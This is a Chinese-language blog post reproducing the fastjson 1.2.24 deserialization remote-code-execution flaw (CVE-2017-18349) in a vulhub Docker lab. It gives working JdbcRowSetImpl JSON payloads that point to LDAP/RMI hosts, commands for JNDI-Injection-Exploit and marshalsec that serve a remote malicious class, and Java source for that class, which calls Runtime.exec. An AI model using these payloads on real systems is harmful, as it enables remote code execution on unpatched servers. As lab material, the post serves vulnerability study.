fastjson1.2.24 反序列化漏洞复现

最新推荐文章于 2024-11-09 16:44:01 发布
最新推荐文章于 2024-11-09 16:44:01 发布
阅读量1k 收藏 14
点赞数 22
CC 4.0 BY-SA版权
分类专栏: 漏洞复现笔记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RMC131/article/details/140592912

fastjson简介

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
这里json与java对象之间的转换,便是使用的序列化和反序列化,fastjson的反序列化也就是来自这里。
详细介绍:https://www.runoob.com/w3cnote/fastjson-intro.html

漏洞环境

vulhub

仅是复现漏洞可以使用vulbub,直接使用docker启动漏洞环境即可。
环境安装参考以下链接
安装docker:https://blog.youkuaiyun.com/BThinker/article/details/123358697
vulhub下载:https://github.com/vulhub/vulhub
使用到的命令:

# 启动
docker-compose up -d
# 查看运行情况
docker ps
# 进入容器
docker exec -it [ID] bash
# 停止容器
docker stop [ID]

漏洞复现

使用JNDI注入测试工具:JNDI-Injection-Exploit-1.0-SNAPSHOT
下载地址:https://gitee.com/yijingsec/JNDI-Injection-Exploit
开启漏洞环境,访问
在这里插入图片描述
构造post请求,可以修改name参数的值
在这里插入图片描述
使用dnslog平台判断是否存在漏洞

{"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://df5789e898.ipv6.1433.eu.org","autoCommit":true}}

在这里插入图片描述
使用JNDI-Injection-Exploit-1.0-SNAPSHOT构造payload利用漏洞
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.232.1
利用成功则会再tmp目录下生成一个success文件
在这里插入图片描述

{"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.232.1:1099/u9plmp","autoCommit":true}}

进入docker查看,利用成功
在这里插入图片描述
也可使用反序列化利用工具 marshalsec,使用起来稍微麻烦一些,需要先构造一个一个恶意类

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

使用javac,编译为class文件,在class目录下使用python开启远程下载python http.server 8888
然后使用以下命令远程加载恶意类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.99.127
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.99.121:4444/#TouchFile” 9999

具体步骤:https://blog.youkuaiyun.com/aetlypdlg_ys/article/details/138752859
marshalsec使用方法参考:https://blog.youkuaiyun.com/whatday/article/details/107942941

漏洞详解

源码环境

可使用IDEA,maven添加依赖,源码可参考

<dependencies>
    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.24</version>
    </dependency>
</dependencies>

直接使用IDEA将vulhub中的jar包复制出来,导入到项目中,即可得到源码。
在这里插入图片描述
重新加载maven,然后运行
在这里插入图片描述

漏洞详解参考

  • 针对fastjson漏洞的代码讲解,基础易懂:https://github.com/Maskhe/javasec/blob/master/9.fastjson-1.2.24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md

  • 针对Fastjson系列漏洞的讲解:https://xz.aliyun.com/t/13386,包括序列化与反序列化,漏洞成因,工具原理等,无比详细。

fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
m0_62284238的博客
09-10 1825
fastjson反序列化漏洞复现 CVE-2017-18349
FastJson1.2.24反序列化原理
最新发布
m0_50125527的博客
05-23 1040
以下利用以1.2.24版本为例,其他的类似POC测试执行DNS解析记录利用JNDI工具进行注入。
Fastjson 1.2.24反序列化漏洞复现
weixin_60830484的博客
04-17 510
本文将进行一次详细的Fastjson 1.2.24反序列化漏洞复现
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
qq_55202378的博客
05-11 1316
如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选记住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
fastjson反序列化-1.2.24
qq_51780583的博客
05-17 242
获取地址rmi://172.16.16.92:1099/juyjrv,然后返回浏览器,抓包放入json格式的payload。抓包,然后burp修改文件类型,然后将修改Content-Type为 application/json。通过JNDI注入程序,开启一个rmi服务。然后Kali编写payload。直接拿去到了root权限。访问靶机8090端口。
fastjson1.2.24反序列化RCE
qq_61860998的博客
06-24 1472
fastjson1.2.24反序列化RCE
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1390
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化。java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
【超详细】Fastjson1.2.24反序列化漏洞复现
SuPejkj的博客
10-20 3514
0x01 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符.
Fastjson反序列化漏洞部署复现1.2.24版本反序列RCE笔记
weixin_51339377的博客
11-09 1061
但是mvn clean package -DskipTests执行需要一个环境变量JAVA_HOME,且对应的地址是jdk文件夹,不带bin。之后rmi服务器从kali的4444端口去取恶意类 返回给rmi服务器 rmi服务器再返回给8090的fastjson执行。总结:所有的java的jdk jre也好 全都直接在path中设置绝对路径。最终通过刚才的工具 启动一个rmi服务器 加载刚才设置的恶意类。设置ip地址为可以访问到的 通过http进行访问测试。会先通过rmi请求到win10的rmi服务器。
Fastjson 1.2.24反序列化漏洞
weixin_51151498的博客
01-04 670
Fastjson 1.2.24反序列化漏洞
反序列化FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349)
Continuejww的博客
09-17 491
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项。
fastjson1.2.24 反序列化漏洞(CVE-2017-18349)分析
st3pby的博客
12-19 1808
FastJson在<=1.2.24@typesetget这里分析利用链。
fastjson-1.2.24漏洞复现
qq_43599126的博客
07-04 1662
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2013
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
fastjson 1.2.24反序列化漏洞复现
ATpiu的博客
03-21 3818
简介 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 环境 靶机:http://192...
fastJson1.2.24漏洞复现
@起风了的博客
05-06 818
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
漏洞复现fastjson_1.2.24_unserializer_rce
过期的秋刀鱼
11-04 415
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
fastjson-1.2.24反序列化
weixin_48776804的博客
05-13 487
fastjson-1.2.24反序列化
fastjson反序列化漏洞复现过程
04-19
下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值